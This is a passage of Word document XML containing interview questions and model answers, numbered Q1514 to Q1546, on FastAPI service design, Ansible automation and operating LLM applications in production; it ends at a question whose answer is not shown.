      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1514. FastAPI caching: How would you add caching with Redis or Memorystore to a FastAPI endpoint, and how would you handle cache invalidation correctly?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cache expensive or frequently-read responses in Redis/Memorystore keyed by a deterministic cache key (endpoint + normalized query params), with a TTL appropriate to how stale the data can be. Invalidate explicitly on writes that affect the cached data (delete or update the specific key) rather than relying only on TTL expiry, and consider cache stampede protection (e.g. a short lock or jittered TTLs) for high-traffic keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1515. FastAPI WebSockets: When would you use WebSockets instead of polling or Server-Sent Events in a FastAPI service, and what operational risks come with it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use WebSockets when you need low-latency, bidirectional communication (chat, live collaboration, streaming LLM tokens); use SSE for simple one-way server-to-client streaming, which is easier to load balance and works over plain HTTP. WebSockets keep long-lived stateful connections, which complicates horizontal scaling (need sticky sessions or a pub/sub backplane like Redis to fan out messages across replicas) and requires explicit handling of reconnects, backpressure, and idle timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1516. FastAPI multi-tenant design: How would you design request-scoped tenant isolation, quotas, and data access boundaries in a shared FastAPI service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Resolve the tenant early via a dependency (from the auth token, subdomain, or header) and thread it through every downstream query so data access is always scoped by tenant ID, ideally enforced at the database layer (row-level security or a tenant_id filter baked into the ORM query builder) rather than trusted per-endpoint. Track per-tenant usage against quotas in a shared store, and add tests that specifically verify one tenant cannot read or mutate another tenant's data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1517. FastAPI API gateway: How would you deploy FastAPI behind an API gateway or load balancer on GCP, including auth, TLS termination, and request tracing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy FastAPI on Cloud Run or GKE behind a global external HTTPS load balancer (or API Gateway/Apigee for policy enforcement), terminate TLS at the load balancer with a managed certificate, and forward auth via a validated JWT or IAP so FastAPI trusts identity from a header rather than re-implementing auth. Propagate a trace/request ID from the gateway into FastAPI middleware so requests can be correlated end to end in Cloud Trace or OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1518. FastAPI contract-first design: How would you design an OpenAPI-first FastAPI service so the schema, docs, and client SDKs stay in sync?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define request/response models with Pydantic so FastAPI auto-generates an accurate OpenAPI schema from the code, or, for true contract-first workflows, author the OpenAPI spec separately and generate the Pydantic models/route stubs from it so client and server never drift. Publish the generated schema in CI, diff it against the previous version to catch accidental breaking changes, and auto-generate client SDKs from the schema so consumers do not hand-write brittle HTTP calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1519. Ansible inventory: How would you structure dynamic inventory for GCP, AWS, and Azure instances instead of maintaining a static inventory file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Ansible's dynamic inventory plugins (gcp_compute, aws_ec2, azure_rm) configured with tag-based or label-based grouping, so hosts are discovered live from each cloud API instead of hand-maintained in an INI file that drifts from reality. Cache inventory results with a short TTL to avoid hammering cloud APIs on every run, and group hosts by environment/role tags so playbooks can target `env_prod:&amp;role_web` style selectors consistently across clouds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1520. Ansible error handling: How do you handle partial failures in a multi-host Ansible run so one bad host doesn't block the rest of the fleet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: By default Ansible removes a failed host from the current play but continues on the rest of the fleet; use `max_fail_percentage` or `any_errors_fatal: false` to control how much failure is tolerated before aborting the whole run, and `ignore_errors: true` sparingly for genuinely non-critical tasks. Always review the retry file Ansible generates (`.retry`) or a summary report at the end so failed hosts are remediated deliberately rather than silently skipped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1521. Ansible Jinja2 templating: How would you use Jinja2 templates in Ansible to generate environment-specific configuration files safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the `template` module with `.j2` files that reference group_vars/host_vars for environment-specific values, keeping secrets out of templates by referencing Ansible Vault-encrypted variables instead of hardcoding them. Validate rendered output with `--check --diff` before applying, and use Jinja2 filters and default() guards defensively so a missing variable fails loudly in CI rather than rendering a broken config silently in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1522. Ansible Tower/AWX: What does Ansible Tower or AWX add on top of plain ansible-playbook for enterprise teams, such as RBAC, scheduling, and audit logging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tower/AWX adds a web UI and REST API for launching and scheduling playbook runs, RBAC so only authorized teams can run specific job templates against specific inventories, credential management that keeps SSH keys and secrets out of individual laptops, and a full audit trail of who ran what, when, and with what result. It also supports workflow templates that chain multiple playbooks with approval gates, which plain ansible-playbook has no concept of.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1523. Ansible OS patching: How would you design a safe, automated OS patching workflow with Ansible that includes health checks, rolling batches, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `serial:` in the playbook to patch hosts in small rolling batches (e.g. 10% at a time) with a health check task after each batch that verifies the service is healthy before proceeding to the next batch. Snapshot or take a backup before patching so a bad patch can be rolled back, and gate the run behind a pre-check task that confirms the host is drained from the load balancer first so patching does not cause user-facing errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1524. Ansible linting: How would you enforce Ansible code quality using ansible-lint, pre-commit hooks, and code review before merging playbook changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run ansible-lint and yamllint as a pre-commit hook and again in CI so style and common-mistake rules (missing handlers, hardcoded credentials, deprecated syntax) are caught before merge, not at run time against production. Require a syntax-check and `--check --diff` dry-run in the PR pipeline, and mandate human review for any playbook touching production inventory groups, with the diff clearly showing which hosts and tasks will be affected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1525. Ansible secrets in CI/CD: How would you securely supply an Ansible Vault password or SSH key to a CI/CD pipeline without hardcoding it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store the Vault password and SSH private key in the CI system's secret store (GitHub Actions secrets, GitLab CI variables) and inject them at runtime as masked environment variables or a temporary file created only for the job's duration, never committed to the repo. Prefer a Vault password file supplied via `--vault-password-file` pointing at a runtime-generated path, and rotate the Vault password and keys periodically, especially after any CI credential exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1526. Ansible multi-cloud: You delivered Ansible IaC across GCP, AWS, and Azure. What did you handle differently for authentication and modules across the three clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Each cloud needed its own authentication mechanism - GCP via a service account JSON key or Workload Identity, AWS via IAM role/access keys, Azure via a service principal - configured through separate collections (google.cloud, amazon.aws, azure.azcollection) with cloud-specific module naming and required parameters. Abstracted common patterns (tagging, naming conventions, network setup) into shared roles where possible, but kept cloud-specific modules and variable files separate since resource models and required fields differ significantly between providers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1527. Ansible with Kubernetes: When would you still use Ansible in a Kubernetes-centric platform, for example bootstrapping nodes or managing non-containerized infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ansible remains useful for bootstrapping the underlying VMs before a cluster exists (OS hardening, kubelet/container runtime install, joining nodes), managing infrastructure that is not containerized (bastion hosts, on-prem servers, network appliances), and one-off operational tasks like credential rotation or OS patching across a fleet. Once workloads themselves are containerized, Kubernetes-native tools (Helm, Kustomize, operators) take over application lifecycle management, with Ansible handling the layer below the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1528. Ansible change management: How would you gate risky Ansible changes, like a fleet-wide restart, behind approvals while keeping routine changes fast?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Classify playbooks by blast radius: routine, well-tested changes (config drift fixes, minor updates) run automatically via CI/CD on merge, while high-risk changes (fleet-wide restarts, OS upgrades, security group changes) require a manual approval gate in the pipeline or an AWX workflow approval node before execution. Always run `--check --diff` first so approvers see exactly what will change, and require the change to go through a small rolling batch (serial:) even after approval so a bad change is caught on a subset of hosts before it reaches the whole fleet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1529. Ansible architecture: Explain the components of Ansible architecture, including the control node, managed nodes, and how they communicate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The control node is the machine where Ansible is installed and from which playbooks are run; managed nodes are the target servers being configured, which need no agent installed. The control node communicates with managed nodes over SSH (or WinRM for Windows), using the inventory to know which hosts to target, and pushes small Python modules to each managed node that execute the requested task and report results back, after which the module is cleaned up - there's no persistent agent or daemon left running on the managed side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1530. Ansible push vs pull: What is the difference between a push-based and a pull-based configuration management model, and where does Ansible fit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In a push-based model, a central control node initiates connections and pushes configuration changes out to target hosts on demand, giving you direct, on-demand control over when changes happen. In a pull-based model, an agent on each managed host periodically checks in with a central server and pulls down and applies its own configuration on a schedule, which scales well for very large fleets but gives less precise control over exact timing. Ansible is push-based by design (connecting over SSH and executing immediately), which is why it needs no persistent agent, unlike pull-based tools like Puppet or Chef in their typical configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1531. Ansible inventory basics: What is an Ansible inventory file, and what does it typically contain?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An inventory file lists the managed hosts Ansible can target, typically organized into groups (like `[webservers]` or `[databases]`) so playbooks can address a whole group at once, and can include per-host or per-group variables (connection details, environment-specific settings) directly in the file. Inventories can be static (a plain INI or YAML file) or dynamic (generated on the fly from a cloud provider's API), letting Ansible target hosts based on live infrastructure state rather than a manually maintained list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1532. Ansible playbooks basics: What are Ansible playbooks, and what does their basic structure look like?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A playbook is a YAML file describing the desired state of one or more hosts as an ordered list of plays, where each play targets a group of hosts from the inventory and runs a list of tasks against them. A basic playbook has a `hosts` field naming the target group, an optional `become` field for privilege escalation, and a `tasks` list where each task names an Ansible module (like `apt`, `copy`, or `service`) along with the parameters describing what that module should do.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1533. Ansible roles basics: What are roles in Ansible, and why would you use them instead of one large playbook?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A role is a standardized, reusable directory structure that packages related tasks, variables, templates, handlers, and files for a specific piece of functionality (like 'install and configure nginx'), which can be included in any playbook rather than copy-pasted. Roles matter because they keep large automation projects organized and reusable - instead of one massive playbook mixing unrelated concerns, you compose focused, independently testable roles, which is especially valuable once multiple teams or many playbooks need the same underlying configuration logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1534. Ansible modules basics: What are Ansible modules, and how do they differ from running a raw shell command?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Modules are the actual units of work Ansible executes - small, purpose-built programs (like `apt`, `file`, `copy`, `service`) that Ansible pushes to the managed node, run, and then removes. Unlike a raw shell/command task, most built-in modules are idempotent by design - they check the current state of the system first and only make a change if the actual state differs from the desired state, so re-running a playbook full of modules is safe, while a raw shell command has no such built-in safety and will simply re-execute every time regardless of current state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1535. Ansible connectivity: How does Ansible connect to and execute commands on remote machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ansible connects to Linux/Unix managed nodes over SSH using either password or key-based authentication, and to Windows nodes over WinRM. Once connected, it copies the relevant Python module code to a temporary location on the remote host, executes it there, captures the JSON-formatted result, and then removes the temporary files - all of this happens per task, per host, which is why no persistent agent process needs to be running on managed nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1536. YAML basics: What is YAML, and why is it used as the configuration language for Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: YAML (YAML Ain't Markup Language) is a human-readable data serialization format that uses indentation and simple syntax to represent structured data (lists, dictionaries, scalars) without the verbosity of XML or the strict bracket-and-comma syntax of JSON. Ansible uses YAML for playbooks because its clean, readable structure makes automation logic easy for humans to write and review, while still being straightforward for Ansible to parse into the structured task and variable data it needs to execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1537. Scenario - partial playbook failure: An Ansible playbook fails on host 40 of 200 mid-rollout, leaving the fleet in mixed state. How do you recover safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First check what state hosts 1-39 were left in versus 40-200 by reviewing the task that failed and whether it was transactional (fully applied or not) or could have partially applied on host 40 itself. Use the auto-generated `.retry` file or a targeted `--limit @failed_hosts.retry` run to retry only the affected and remaining hosts once the root cause (a bad package version, unreachable dependency, etc.) is fixed, rather than re-running against all 200 and risking side effects on the hosts that already succeeded. Add a health-check task and smaller `serial:` batches so a future failure is caught after 5 hosts instead of 40.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1538. Scenario - vaulted secret rotation: You need to rotate a secret stored in Ansible Vault across all environments without causing a mid-day outage. How do you plan it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add the new secret value alongside the old one first (many systems support dual-active credentials briefly) so services can pick up the new secret without a hard cutover, update the Vault-encrypted variable and roll it out via a rolling `serial:` batch during a low-traffic window, and verify each batch's health before proceeding. Only revoke the old secret once every environment confirms it's using the new one, and keep the old value available for a short rollback window in case a missed host or cached credential surfaces after rollout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1539. Prompt lifecycle management: How would you version, test, review, and roll back prompt changes the same way you would application code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store prompts in version control alongside application code, not as untracked strings, and require PR review for changes with a diff showing exactly what wording changed. Run an automated evaluation suite (a fixed set of test inputs with expected quality criteria) before merging, deploy behind a feature flag or canary so a new prompt reaches a small percentage of traffic first, and keep the previous prompt version one config change away for instant rollback if quality regresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1540. LLM latency debugging: A chat feature has high p95 latency. How would you separate model inference time, retrieval time, network hops, and streaming/rendering delays?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Instrument each stage with its own timing span using distributed tracing (OpenTelemetry) - retrieval/embedding lookup, model inference (time to first token and total generation time separately), and network round trips - so the trace clearly shows which stage dominates p95 rather than only seeing total request time. Check whether latency is inference-bound (model size, batch contention, cold starts) versus retrieval-bound (vector DB query time, too many retrieved chunks) versus client-side (slow streaming render), since each has a different fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1541. Model routing and fallback: How would you design fallback between a primary and secondary LLM provider or model when the primary times out, rate-limits, or returns low-confidence output?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a routing layer that sets a strict timeout on the primary call, catches rate-limit (429) and timeout errors specifically, and retries against a secondary provider/model rather than failing the request outright. For quality-based fallback (not just errors), define a confidence signal (e.g. a low-quality flag from an evaluator model or a heuristic like an empty/truncated response) and route to the secondary on that signal too, logging which model actually served each response for cost and quality tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1542. Streaming inference infra: How would you design backend infrastructure for streaming LLM responses over GKE/Cloud Run, including timeouts, load balancing, and client reconnects?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Server-Sent Events or chunked HTTP streaming with a load balancer and timeout configuration that supports long-lived connections (increase backend timeout well beyond typical generation time, and disable buffering on any proxy in the path). Design the client to handle reconnects by resuming from the last received token offset where possible, and size GKE/Cloud Run concurrency limits around how many simultaneous streaming connections a pod can hold in memory, not just CPU/request-count based autoscaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1543. GPU serving cost: How would you decide between managed model endpoints, self-hosted GPU serving with vLLM/TGI, and batch inference for different GenAI workloads on cost and latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use managed endpoints (Vertex AI, or a hosted API) for low/unpredictable volume where operational simplicity outweighs per-token cost, and move to self-hosted GPU serving with vLLM/TGI once volume is high and steady enough that GPU utilization amortizes the operational overhead - vLLM's continuous batching in particular improves throughput significantly for high-concurrency workloads. Use batch inference (no real-time latency requirement) with spot/preemptible GPUs for offline scoring jobs, since that's the cheapest option when synchronous response time doesn't matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1544. PII and data handling: How would you prevent PII and secrets from leaking into LLM prompts, logs, third-party model providers, and evaluation datasets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run PII detection/redaction (regex plus a lightweight NER model) on user input before it enters the prompt or gets logged, and configure logging to store redacted prompts by default with raw prompts available only under stricter access control if needed for debugging. Review data processing agreements with third-party model providers before sending any sensitive data, and scrub or synthesize evaluation datasets so real customer PII never ends up in a shared eval/test set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1545. Vertex AI Agent Builder: How would you operate a production Vertex AI Agent Builder or Model Garden deployment, including versioning, monitoring, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Version agent configurations (grounding sources, tools, system instructions) in source control the same as application code, and deploy through a staged pipeline (dev -&gt; staging -&gt; prod) with evaluation gates rather than editing the live agent directly. Monitor grounding accuracy, tool-call success rate, and latency/cost per conversation, and keep the previous agent version deployable so a regression in groundedness or tool behavior can be rolled back immediately rather than debugged live in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1546. Vertex AI platform design: How would you design a production ML platform on Vertex AI for training, registry, deployment, monitoring, IAM, and cost control?</w:t>
      </w:r>
    </w:p>
    <w:p>
